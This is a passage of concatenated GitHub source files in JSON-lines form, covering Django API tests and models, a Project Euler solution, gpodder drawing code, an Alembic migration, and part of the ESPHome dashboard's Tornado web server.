grid_values = np.apply_along_axis(grid_fun, 1, grid_points)\n grid_uncert = np.apply_along_axis(grid_fun, 1, grid_points)/10\n\n correct = Correction((grid_x, grid_y),\n grid_values,\n grid_uncert,\n **opt_cubic)\n\n x_test = np.random.uniform(xmin, xmax, size=100)\n y_test = np.random.uniform(ymin, ymax, size=100)\n xy_test = np.stack([x_test, y_test], axis=1)\n\n correction = correct(x_test, y_test)\n expected_values = np.apply_along_axis(grid_fun, 1, xy_test)\n expected_uncert = expected_values/10\n\n assert np.allclose(correction.value , expected_values)\n assert np.allclose(correction.uncertainty, expected_uncert)\n","repo_name":"jmbenlloch/testprod","sub_path":"invisible_cities/reco/corrections_test.py","file_name":"corrections_test.py","file_ext":"py","file_size_in_byte":19395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6599790636","text":"from copy import deepcopy\nfrom django.contrib.auth.models import User\n\nfrom rest_framework import status\n\nfrom core.tests.base import LibraryManagementBaseTestCase\nfrom library.models import Author\n\n\nclass AuthorAPIEndpointTestCase(LibraryManagementBaseTestCase):\n def setUp(self) -> None:\n super(AuthorAPIEndpointTestCase, self).setUp()\n # Create an author for test\n self.initial_author_data = {\n 'name': 'Iron Fist',\n 'gender': 'Male',\n 'username': 'iron_fist',\n 'password': self.common_passwd,\n 'confirm_password': self.common_passwd,\n }\n _user = User(username='ash_author')\n _user.set_password(raw_password=self.common_passwd)\n _user.save()\n self.author = Author(name='Ashraful Islam', gender='Male')\n self.author.user = _user\n self.author.save()\n\n def test_delete_author_api(self):\n # Login as admin user\n self.login_admin_user()\n response = self.client.delete(path=f'/api/authors/{self.author.id}/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n # Login as member user\n self.login_member_user()\n response = self.client.delete(path=f'/api/authors/{self.author.id}/')\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_get_author_api(self):\n # Login as admin user\n self.login_admin_user()\n response = self.client.get(path='/api/authors/')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(isinstance(response.data['results'], list))\n\n # Login as member user\n self.login_member_user()\n response = self.client.get(path='/api/authors/')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(isinstance(response.data['results'], list))\n\n def test_post_author_api(self):\n self.login_admin_user()\n _data = deepcopy(self.initial_author_data)\n response = self.client.post(path='/api/authors/', data=_data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertTrue(isinstance(response.data, dict))\n self.assertEqual(response.data['name'], _data['name'])\n self.assertEqual(response.data['gender'], _data['gender'])\n\n # Login as member user\n self.login_member_user()\n _data = deepcopy(self.initial_author_data)\n response = self.client.post(path='/api/authors/', data=_data)\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_put_author_api(self):\n self.login_admin_user()\n _data = deepcopy(self.initial_author_data)\n _data['name'] = 'Allison Argent'\n _data['gender'] = 'Female'\n response = self.client.put(path=f'/api/authors/{self.author.id}/', data=_data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(isinstance(response.data, dict))\n self.assertNotEqual(response.data['name'], self.author.name) # not matched with old title\n self.assertNotEqual(response.data['gender'], self.author.gender) # not matched with old description\n self.assertEqual(response.data['name'], _data['name']) # Updated name matched\n self.assertEqual(response.data['gender'], _data['gender']) # Updated name matched\n\n # Login as member user\n self.login_member_user()\n _data = deepcopy(self.initial_author_data)\n _data['name'] = 'Allison Argent'\n _data['gender'] = 'Female'\n response = self.client.put(path=f'/api/authors/{self.author.id}/', data=_data)\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n","repo_name":"iashraful/interview-evaly-book-library-api","sub_path":"library/tests/tests_author_api_endpoints.py","file_name":"tests_author_api_endpoints.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71432917374","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\nfrom django.utils import timezone\n\n# 用户\nfrom iLab import settings\n\n\nclass User(AbstractUser):\n is_approved = models.BooleanField(default=False) # 是否为已通过审核的正式成员\n\n\n# 公告\nclass Notice(models.Model):\n title = models.CharField(max_length=255) # 公告标题\n content = models.TextField() # 公告内容\n publish_time = models.DateTimeField(default=timezone.now) # 发布时间\n edit_time = models.DateTimeField(auto_now=True) # 最后编辑时间\n priority = models.SmallIntegerField(default=1) # 公告优先级 越大优先级越高 0为禁用\n publisher = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE) # 发布者\n\n\n# 正式成员信息(档案)\nclass Archive(models.Model):\n user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE) # 关联的用户(一对一)\n student_num = models.CharField(max_length=32, unique=True, null=True) # 学号\n name = models.CharField(max_length=16, null=True) # 真实姓名\n mobile_num = models.CharField(max_length=20, unique=True, null=True) # 手机号\n","repo_name":"Ginakira/Labman","sub_path":"labman/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74340076736","text":"import binascii\nimport os\nfrom typing import List\n\nfrom django.conf import settings\nfrom django.db import models\n\nfrom bitfield import BitField\n\nfrom glitchtip.base_models import CreatedModel\n\n\ndef generate_token():\n return binascii.hexlify(os.urandom(32)).decode()\n\n\nclass APIToken(CreatedModel):\n \"\"\"\n Ideas borrowed from rest_framework.authtoken and sentry.apitoken\n \"\"\"\n\n token = models.CharField(\n max_length=64, unique=True, editable=False, default=generate_token\n )\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n label = models.CharField(max_length=255, blank=True)\n scopes = BitField(\n flags=(\n \"project:read\",\n \"project:write\",\n \"project:admin\",\n \"project:releases\",\n \"team:read\",\n \"team:write\",\n \"team:admin\",\n \"event:read\",\n \"event:write\",\n \"event:admin\",\n \"org:read\",\n \"org:write\",\n \"org:admin\",\n \"member:read\",\n \"member:write\",\n \"member:admin\",\n )\n )\n\n def __str__(self):\n return self.token\n\n def get_scopes(self):\n \"\"\"\n Return array of set scope flags.\n Example: [\"project:read\"]\n \"\"\"\n return [i[0] for i in self.scopes.items() if i[1] is True]\n\n def add_permission(self, permission: str):\n \"\"\" Add permission flag to scopes and save \"\"\"\n setattr(self.scopes, permission, True)\n self.save(update_fields=[\"scopes\"])\n\n def add_permissions(self, permissions: List[str]):\n \"\"\" Add permission flags to scopes and save \"\"\"\n for permission in permissions:\n setattr(self.scopes, permission, True)\n self.save(update_fields=[\"scopes\"])\n","repo_name":"diwaperkasa/glitchtip","sub_path":"code/api_tokens/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22771524731","text":"from collections import deque\n\ndef search(lines,pattern,history=5):\n\tprevious_lines = deque(maxlen=history)\n\tfor line in lines:\n\t\tif pattern in line:\n\t\t\tyield line,previous_lines\n\t\tprevious_lines.append(line)\n\t\t\n\t\t\n\n\"\"\"Using deque(maxlen=N) creates a fixed-sized queue. When new items are added and the queue is full, the oldest item is automatically removed\"\"\"\nq = deque(maxlen=3)\nq.append(3)\nq.append(1)\nq.append(2)\nprint(q)\n\nq.append(4)\nq.append(5)\nprint(q)\nq.appendleft(7)\nprint(q)\t\nq.popleft()\nprint(q)\t\nq.pop()\nprint(q)\nq.extend('werwe')\nprint(q)\t\nq.rotate(1)\nprint(q)\nq.rotate(2)\nprint(q)\t\n\t\t\nif __name__=='__main__':\n\twith open('test.txt') as f:\n\t\tfor line,previous_lines in search(f,' is ',5):\n\t\t\tfor pline in previous_lines:\n\t\t\t\tprint(pline,end='')\n\t\t\tprint(line,end='')\n\t\t\tprint('-'*20)","repo_name":"ishank296/python-cookbook","sub_path":"Chapter_1/keeping_last_n_elements.py","file_name":"keeping_last_n_elements.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19686729409","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Comment\n\nclass ContentCrawler:\n \"\"\"\n Crawler to crawl all the visible text data from a given page, without stripping the white spaces and \n removing the stop words.\n \n \"\"\"\n def __init__(self, target_url):\n \"\"\"\n Create an ContentCrawler instance from target_url \n \n :param target_url: url of the page to scrape from\n :type target_url: str\n \"\"\"\n self.__target_url = target_url\n\n @staticmethod\n def filter_invalid_str(s):\n \"\"\"\n Filter out comment strings and strings whose parents tags are \n \"\"\")\n for type_and_class, w in type_classes_and_widgets:\n f.write(\"\\n\")\n f.write(\"
\\n\")\n # Create an empty style context\n style_ctx = Gtk.StyleContext()\n # Create an empty widget path\n widget_path = Gtk.WidgetPath()\n # Specify the widget class type you want to get colors from\n for t, c, r in type_and_class:\n widget_path.append_type(t)\n if c:\n widget_path.iter_add_class(widget_path.length() - 1, c)\n if r:\n widget_path.iter_add_region(widget_path.length() - 1, r, 0)\n style_ctx.set_path(widget_path)\n\n investigate_stylecontext(\n style_ctx,\n 'STATIC {}'.format(' '.join('{}.{}({})'.format(t.__name__, c, r) for t, c, r in type_and_class)))\n\n f.write(\"
\\n\")\n\n investigate_stylecontext(w.get_style_context(), 'LIVE {}'.format(type(w).__name__))\n\n f.write(\"
\\n\")\n\n\ndef draw_iconcell_scale(column, cell, model, iter, scale):\n \"\"\"\n Draw cell's pixbuf to a surface with proper scaling for high resolution\n displays. To be used as gtk.TreeViewColumn.set_cell_data_func.\n\n :param column: gtk.TreeViewColumn (ignored)\n :param cell: gtk.CellRenderer\n :param model: gtk.TreeModel (ignored)\n :param iter: gtk.TreeIter (ignored)\n :param scale: factor of the target display (e.g. 1 or 2)\n \"\"\"\n pixbuf = cell.props.pixbuf\n if not pixbuf:\n return\n\n width = pixbuf.get_width()\n height = pixbuf.get_height()\n scale_inv = 1 / scale\n\n surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, width, height)\n surface.set_device_scale(scale, scale)\n\n cr = cairo.Context(surface)\n cr.scale(scale_inv, scale_inv)\n Gdk.cairo_set_source_pixbuf(cr, cell.props.pixbuf, 0, 0)\n cr.paint()\n\n cell.props.surface = surface\n","repo_name":"gpodder/gpodder","sub_path":"src/gpodder/gtkui/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":18559,"program_lang":"python","lang":"en","doc_type":"code","stars":1186,"dataset":"github-code","pt":"7"} +{"seq_id":"30638526166","text":"\"\"\"create_initial_database\n\nRevision ID: 4c76c573a64e\nRevises: \nCreate Date: 2021-08-23 20:38:20.209148\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '4c76c573a64e'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('ingredients',\n sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('name', mysql.VARCHAR(length=128), nullable=True),\n sa.Column('price', mysql.DOUBLE(asdecimal=True), nullable=True),\n sa.Column('quantity', mysql.INTEGER(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('pizza',\n sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('name', mysql.VARCHAR(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('pizza_ingredients',\n sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('pizza_id', mysql.INTEGER(), nullable=True),\n sa.Column('ingredient_id', mysql.INTEGER(), nullable=True),\n sa.Column('quantity', mysql.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['ingredient_id'], ['ingredients.id'], ),\n sa.ForeignKeyConstraint(['pizza_id'], ['pizza.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('pizza_ingredients')\n op.drop_table('pizza')\n op.drop_table('ingredients')\n # ### end Alembic commands ###\n","repo_name":"mihaitzzza/nt-06-python","sub_path":"desktop-apps/migrations/versions/4c76c573a64e_create_initial_database.py","file_name":"4c76c573a64e_create_initial_database.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"23831785230","text":"'''\nCreated on 2013-04-05\n\nProblem 26:\nA unit fraction contains 1 in the numerator. The decimal representation of the unit fractions with denominators 2 to 10 are given:\n\n1/2 = 0.5\n1/3 = 0.(3)\n1/4 = 0.25\n1/5 = 0.2\n1/6 = 0.1(6)\n1/7 = 0.(142857)\n1/8 = 0.125\n1/9 = 0.(1)\n1/10 = 0.1\n\nWhere 0.1(6) means 0.166666..., and has a 1-digit recurring cycle. It can be seen that 1/7 has a 6-digit recurring cycle.\n\nFind the value of d < 1000 for which 1/d has the longest recurring cycle in its decimal fraction part.\n\nSOLUTION: 983\n@author: Jason Baker\n'''\n\ndef factor(N):\n factors = []\n \n for i in range(2, N):\n while(N % i == 0):\n factors.append(i)\n N = N/i\n if N == 1: break\n return factors\n\ndef isPrime(num):\n return len(factor(num)) == 0\n\ndef primeFactorization(N):\n result = []\n \n for i in range(2, N):\n if(N % i == 0) and isPrime(i):\n k = 1\n tmp = int( N/i )\n \n while(tmp/i % 1 == 0):\n k += 1\n tmp = int( tmp/i )\n result += [[i, k]]\n \n return result\n\ndef genNines(nines):\n return (10 * nines) + 9\n\ndef gcd(a, b):\n if a < b: return gcd(b, a)\n elif b == 0: return a\n else:\n return gcd(b, a%b)\n \ndef lcm(a, b):\n return int( (a/gcd(a, b)) * b )\n\n# Finally getting more use out of this LCM function\ndef multLcm(nums):\n if len(nums) == 1:\n return nums[0]\n if len(nums) == 2:\n return lcm(nums[0], nums[1])\n else:\n return lcm(multLcm(nums[1:]), nums[0])\n \ndef findPeriod(denominator):\n factors = primeFactorization(denominator)\n # These are all the terminating decimals, so they have no recurring cycles\n if denominator == 2 or denominator == 5 or (len(factors) == 1 and (factors[0][0] == 2 or factors[0][0] == 5)) or (len(factors) == 2 and factors[0][0] == 2 and factors[1][0] == 5):\n return 0\n # Let's check the primitive primes\n elif len(factors) == 0:\n i = 1\n nines = genNines(0)\n \n while(nines%denominator > 0):\n i += 1\n nines = genNines(nines)\n \n return i\n # Now for composite numbers\n else:\n # Fun property of integers not co-prime to 10: when you strip out the 2s and 5s, they're just like any others\n if denominator % 2 == 0 or denominator % 5 == 0:\n while denominator/2 % 1 == 0:\n denominator = int( denominator/2 )\n while denominator/5 % 1 == 0:\n denominator = int( denominator/5 )\n return findPeriod(denominator)\n \n # Some special cases that require special handling\n if denominator == 3:\n return 1\n elif denominator == 487:\n return 486\n # Now we can get to the real meat of the algorithm\n primePeriods = []\n \n for f in factors:\n # 3 is still a special case\n if f[0] == 3:\n if f[1] == 1:\n primePeriods += [1]\n else:\n primePeriods += [ f[0]**(f[1] - 2) ]\n else:\n # A funny little property that makes this algorithm nice and quick\n primePeriods += [ f[0]**(f[1] - 1) * findPeriod(f[0]) ]\n return multLcm(primePeriods)\n\n#print(findPeriod(867))\nlargestCycle = 0\nd = 0\n\nfor i in range(2, 1000):\n cycle = findPeriod(i)\n if cycle > largestCycle:\n largestCycle = cycle\n d = i\n \nprint(d)","repo_name":"jwbaker/projecteuler","sub_path":"PE26.py","file_name":"PE26.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24152204579","text":"import tkinter.ttk as ttk\n\n\nclass MenuFrame(ttk.Frame):\n def __init__(self, top, frames):\n ttk.Frame.__init__(self, top)\n self.frames = frames\n self.top = top\n zgo_btn = ttk.Button(self)\n zgo_btn.configure(text=\"ZGO\",\n command=lambda: self.change_frame(frames[0]))\n zgo_btn.grid()\n zgz_btn = ttk.Button(self)\n zgz_btn.configure(text=\"ZGZ\",\n command=lambda: self.change_frame(frames[1]))\n zgz_btn.grid(column=1, row=0)\n draft_btn = ttk.Button(self)\n draft_btn.configure(text=\"Ciąg\",\n command=lambda: self.change_frame(frames[2]))\n draft_btn.grid(column=2, row=0)\n config_btn = ttk.Button(self)\n config_btn.configure(text=\"Konfiguracja\",\n command=lambda: self.change_frame(frames[3]))\n config_btn.grid(column=3, row=0)\n\n def change_frame(self, new_frame):\n for frame in self.frames:\n frame.grid_forget()\n new_frame.grid(column=0, row=1, sticky=\"W\")\n","repo_name":"Matexer/TopoCal","sub_path":"gui/frames/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9529910559","text":"# pylint: disable=wrong-import-position\n\nimport codecs\nimport collections\nimport functools\nimport hashlib\nimport hmac\nimport json\nimport logging\nimport multiprocessing\nimport os\nimport shutil\nimport subprocess\nimport threading\n\nimport tornado\nimport tornado.concurrent\nimport tornado.gen\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.iostream\nfrom tornado.log import access_log\nimport tornado.netutil\nimport tornado.process\nimport tornado.web\nimport tornado.websocket\n\nfrom esphome import const, util\nfrom esphome.__main__ import get_serial_ports\nfrom esphome.helpers import mkdir_p, get_bool_env, run_system_command\nfrom esphome.storage_json import EsphomeStorageJSON, StorageJSON, \\\n esphome_storage_path, ext_storage_path, trash_storage_path\nfrom esphome.util import shlex_quote\n\n# pylint: disable=unused-import, wrong-import-order\nfrom typing import Optional # noqa\n\nfrom esphome.zeroconf import DashboardStatus, Zeroconf\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass DashboardSettings:\n def __init__(self):\n self.config_dir = ''\n self.password_digest = ''\n self.username = ''\n self.using_password = False\n self.on_hassio = False\n self.cookie_secret = None\n\n def parse_args(self, args):\n self.on_hassio = args.hassio\n password = args.password or os.getenv('PASSWORD', '')\n if not self.on_hassio:\n self.username = args.username or os.getenv('USERNAME', '')\n self.using_password = bool(password)\n if self.using_password:\n self.password_digest = hmac.new(password.encode()).digest()\n self.config_dir = args.configuration[0]\n\n @property\n def relative_url(self):\n return os.getenv('ESPHOME_DASHBOARD_RELATIVE_URL', '/')\n\n @property\n def status_use_ping(self):\n return get_bool_env('ESPHOME_DASHBOARD_USE_PING')\n\n @property\n def using_hassio_auth(self):\n if not self.on_hassio:\n return False\n return not get_bool_env('DISABLE_HA_AUTHENTICATION')\n\n @property\n def using_auth(self):\n return self.using_password or self.using_hassio_auth\n\n def check_password(self, username, password):\n if not self.using_auth:\n return True\n if username != self.username:\n return False\n\n password = hmac.new(password.encode()).digest()\n return username == self.username and hmac.compare_digest(self.password_digest, password)\n\n def rel_path(self, *args):\n return os.path.join(self.config_dir, *args)\n\n def list_yaml_files(self):\n return util.list_yaml_files(self.config_dir)\n\n\nsettings = DashboardSettings()\n\ncookie_authenticated_yes = b'yes'\n\n\ndef template_args():\n version = const.__version__\n return {\n 'version': version,\n 'docs_link': 'https://beta.esphome.io/' if 'b' in version else 'https://esphome.io/',\n 'get_static_file_url': get_static_file_url,\n 'relative_url': settings.relative_url,\n 'streamer_mode': get_bool_env('ESPHOME_STREAMER_MODE'),\n 'config_dir': settings.config_dir,\n }\n\n\ndef authenticated(func):\n @functools.wraps(func)\n def decorator(self, *args, **kwargs):\n if not is_authenticated(self):\n self.redirect('./login')\n return None\n return func(self, *args, **kwargs)\n return decorator\n\n\ndef is_authenticated(request_handler):\n if settings.on_hassio:\n # Handle ingress - disable auth on ingress port\n # X-Hassio-Ingress is automatically stripped on the non-ingress server in nginx\n header = request_handler.request.headers.get('X-Hassio-Ingress', 'NO')\n if str(header) == 'YES':\n return True\n if settings.using_auth:\n return request_handler.get_secure_cookie('authenticated') == cookie_authenticated_yes\n return True\n\n\ndef bind_config(func):\n def decorator(self, *args, **kwargs):\n configuration = self.get_argument('configuration')\n if not is_allowed(configuration):\n self.set_status(500)\n return None\n kwargs = kwargs.copy()\n kwargs['configuration'] = configuration\n return func(self, *args, **kwargs)\n return decorator\n\n\n# pylint: disable=abstract-method\nclass BaseHandler(tornado.web.RequestHandler):\n pass\n\n\ndef websocket_class(cls):\n # pylint: disable=protected-access\n if not hasattr(cls, '_message_handlers'):\n cls._message_handlers = {}\n\n for _, method in cls.__dict__.items():\n if hasattr(method, \"_message_handler\"):\n cls._message_handlers[method._message_handler] = method\n\n return cls\n\n\ndef websocket_method(name):\n def wrap(fn):\n # pylint: disable=protected-access\n fn._message_handler = name\n return fn\n return wrap\n\n\n# pylint: disable=abstract-method, arguments-differ\n@websocket_class\nclass EsphomeCommandWebSocket(tornado.websocket.WebSocketHandler):\n def __init__(self, application, request, **kwargs):\n super().__init__(application, request, **kwargs)\n self._proc = None\n self._is_closed = False\n\n @authenticated\n def on_message(self, message):\n # Messages are always JSON, 500 when not\n json_message = json.loads(message)\n type_ = json_message['type']\n # pylint: disable=no-member\n handlers = type(self)._message_handlers\n if type_ not in handlers:\n _LOGGER.warning(\"Requested unknown message type %s\", type_)\n return\n\n handlers[type_](self, json_message)\n\n @websocket_method('spawn')\n def handle_spawn(self, json_message):\n if self._proc is not None:\n # spawn can only be called once\n return\n command = self.build_command(json_message)\n _LOGGER.info(\"Running command '%s'\", ' '.join(shlex_quote(x) for x in command))\n self._proc = tornado.process.Subprocess(command,\n stdout=tornado.process.Subprocess.STREAM,\n stderr=subprocess.STDOUT,\n stdin=tornado.process.Subprocess.STREAM)\n self._proc.set_exit_callback(self._proc_on_exit)\n tornado.ioloop.IOLoop.current().spawn_callback(self._redirect_stdout)\n\n @property\n def is_process_active(self):\n return self._proc is not None and self._proc.returncode is None\n\n @websocket_method('stdin')\n def handle_stdin(self, json_message):\n if not self.is_process_active:\n return\n data = json_message['data']\n data = codecs.encode(data, 'utf8', 'replace')\n _LOGGER.debug(\"< stdin: %s\", data)\n self._proc.stdin.write(data)\n\n @tornado.gen.coroutine\n def _redirect_stdout(self):\n reg = b'[\\n\\r]'\n\n while True:\n try:\n data = yield self._proc.stdout.read_until_regex(reg)\n except tornado.iostream.StreamClosedError:\n break\n data = codecs.decode(data, 'utf8', 'replace')\n\n _LOGGER.debug(\"> stdout: %s\", data)\n self.write_message({'event': 'line', 'data': data})\n\n def _proc_on_exit(self, returncode):\n if not self._is_closed:\n # Check if the proc was not forcibly closed\n _LOGGER.info(\"Process exited with return code %s\", returncode)\n self.write_message({'event': 'exit', 'code': returncode})\n\n def on_close(self):\n # Check if proc exists (if 'start' has been run)\n if self.is_process_active:\n _LOGGER.debug(\"Terminating process\")\n self._proc.proc.terminate()\n # Shutdown proc on WS close\n self._is_closed = True\n\n def build_command(self, json_message):\n raise NotImplementedError\n\n\nclass EsphomeLogsHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"logs\", '--serial-port',\n json_message[\"port\"]]\n\n\nclass EsphomeUploadHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"run\", '--upload-port',\n json_message[\"port\"]]\n\n\nclass EsphomeCompileHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"compile\"]\n\n\nclass EsphomeValidateHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"config\"]\n\n\nclass EsphomeCleanMqttHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"clean-mqtt\"]\n\n\nclass EsphomeCleanHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n config_file = settings.rel_path(json_message['configuration'])\n return [\"esphome\", \"--dashboard\", config_file, \"clean\"]\n\n\nclass EsphomeVscodeHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n return [\"esphome\", \"--dashboard\", \"-q\", 'dummy', \"vscode\"]\n\n\nclass EsphomeAceEditorHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n return [\"esphome\", \"--dashboard\", \"-q\", settings.config_dir, \"vscode\", \"--ace\"]\n\n\nclass EsphomeUpdateAllHandler(EsphomeCommandWebSocket):\n def build_command(self, json_message):\n return [\"esphome\", \"--dashboard\", settings.config_dir, \"update-all\"]\n\n\nclass SerialPortRequestHandler(BaseHandler):\n @authenticated\n def get(self):\n ports = get_serial_ports()\n data = []\n for port, desc in ports:\n if port == '/dev/ttyAMA0':\n desc = 'UART pins on GPIO header'\n split_desc = desc.split(' - ')\n if len(split_desc) == 2 and split_desc[0] == split_desc[1]:\n # Some serial ports repeat their values\n desc = split_desc[0]\n data.append({'port': port, 'desc': desc})\n data.append({'port': 'OTA', 'desc': 'Over-The-Air'})\n data.sort(key=lambda x: x['port'], reverse=True)\n self.write(json.dumps(data))\n\n\nclass WizardRequestHandler(BaseHandler):\n @authenticated\n def post(self):\n from esphome import wizard\n\n kwargs = {\n k: ''.join(x.decode() for x in v)\n for k, v in self.request.arguments.items()\n }\n destination = settings.rel_path(kwargs['name'] + '.yaml')\n wizard.wizard_write(path=destination, **kwargs)\n self.redirect('./?begin=True')\n\n\nclass DownloadBinaryRequestHandler(BaseHandler):\n @authenticated\n @bind_config\n def get(self, configuration=None):\n # pylint: disable=no-value-for-parameter\n storage_path = ext_storage_path(settings.config_dir, configuration)\n storage_json = StorageJSON.load(storage_path)\n if storage_json is None:\n self.send_error()\n return\n\n path = storage_json.firmware_bin_path\n self.set_header('Content-Type', 'application/octet-stream')\n filename = f'{storage_json.name}.bin'\n self.set_header(\"Content-Disposition\", f'attachment; filename=\"{filename}\"')\n with open(path, 'rb') as f:\n while True:\n data = f.read(16384)\n if not data:\n break\n self.write(data)\n self.finish()\n\n\ndef _list_dashboard_entries():\n files = settings.list_yaml_files()\n return [DashboardEntry(file) for file in files]\n\n\nclass DashboardEntry:\n def __init__(self, path):\n self.path = path\n self._storage = None\n self._loaded_storage = False\n\n @property\n def filename(self):\n return os.path.basename(self.path)\n\n @property\n def storage(self): # type: () -> Optional[StorageJSON]\n if not self._loaded_storage:\n self._storage = StorageJSON.load(ext_storage_path(settings.config_dir, self.filename))\n self._loaded_storage = True\n return self._storage\n\n @property\n def address(self):\n if self.storage is None:\n return None\n return self.storage.address\n\n @property\n def name(self):\n if self.storage is None:\n return self.filename[:-len('.yaml')]\n return self.storage.name\n\n @property\n def comment(self):\n if self.storage is None:\n return None\n return self.storage.comment\n\n @property\n def esp_platform(self):\n if self.storage is None:\n return None\n return self.storage.esp_platform\n\n @property\n def board(self):\n if self.storage is None:\n return None\n return self.storage.board\n\n @property\n def update_available(self):\n if self.storage is None:\n return True\n return self.update_old != self.update_new\n\n @property\n def update_old(self):\n if self.storage is None:\n return ''\n return self.storage.esphome_version or ''\n\n @property\n def update_new(self):\n return const.__version__\n\n @property\n def loaded_integrations(self):\n if self.storage is None:\n return []\n return self.storage.loaded_integrations\n\n\nclass MainRequestHandler(BaseHandler):\n @authenticated\n def get(self):\n begin = bool(self.get_argument('begin', False))\n entries = _list_dashboard_entries()\n\n self.render(\"templates/index.html\", entries=entries, begin=begin,\n **template_args())\n\n\ndef _ping_func(filename, address):\n if os.name == 'nt':\n command = ['ping', '-n', '1', address]\n else:\n command = ['ping', '-c', '1', address]\n rc, _, _ = run_system_command(*command)\n return filename, rc == 0\n\n\nclass MDNSStatusThread(threading.Thread):\n def run(self):\n zc = Zeroconf()\n\n def on_update(dat):\n for key, b in dat.items():\n PING_RESULT[key] = b\n\n stat = DashboardStatus(zc, on_update)\n stat.start()\n while not STOP_EVENT.is_set():\n entries = _list_dashboard_entries()\n stat.request_query({entry.filename: entry.name + '.local.' for entry in entries})\n\n PING_REQUEST.wait()\n PING_REQUEST.clear()\n stat.stop()\n stat.join()\n zc.close()\n\n\nclass PingStatusThread(threading.Thread):\n def run(self):\n pool = multiprocessing.Pool(processes=8)\n while not STOP_EVENT.is_set():\n # Only do pings if somebody has the dashboard open\n\n def callback(ret):\n PING_RESULT[ret[0]] = ret[1]\n\n entries = _list_dashboard_entries()\n queue = collections.deque()\n for entry in entries:\n if entry.address is None:\n PING_RESULT[entry.filename] = None\n continue\n\n result = pool.apply_async(_ping_func, (entry.filename, entry.address),\n callback=callback)\n queue.append(result)\n\n while queue:\n item = queue[0]\n if item.ready():\n queue.popleft()\n continue\n\n try:\n item.get(0.1)\n except OSError:\n # ping not installed\n pass\n except multiprocessing.TimeoutError:\n pass\n\n if STOP_EVENT.is_set():\n pool.terminate()\n return\n\n PING_REQUEST.wait()\n PING_REQUEST.clear()\n\n\nclass PingRequestHandler(BaseHandler):\n @authenticated\n def get(self):\n PING_REQUEST.set()\n self.write(json.dumps(PING_RESULT))\n\n\ndef is_allowed(configuration):\n return os.path.sep not in configuration\n\n\nclass EditRequestHandler(BaseHandler):\n @authenticated\n @bind_config\n def get(self, configuration=None):\n filename = settings.rel_path(configuration)\n content = ''\n if os.path.isfile(filename):\n # pylint: disable=no-value-for-parameter\n with open(filename, 'r') as f:\n content = f.read()\n self.write(content)\n\n @authenticated\n @bind_config\n def post(self, configuration=None):\n # pylint: disable=no-value-for-parameter\n with open(settings.rel_path(configuration), 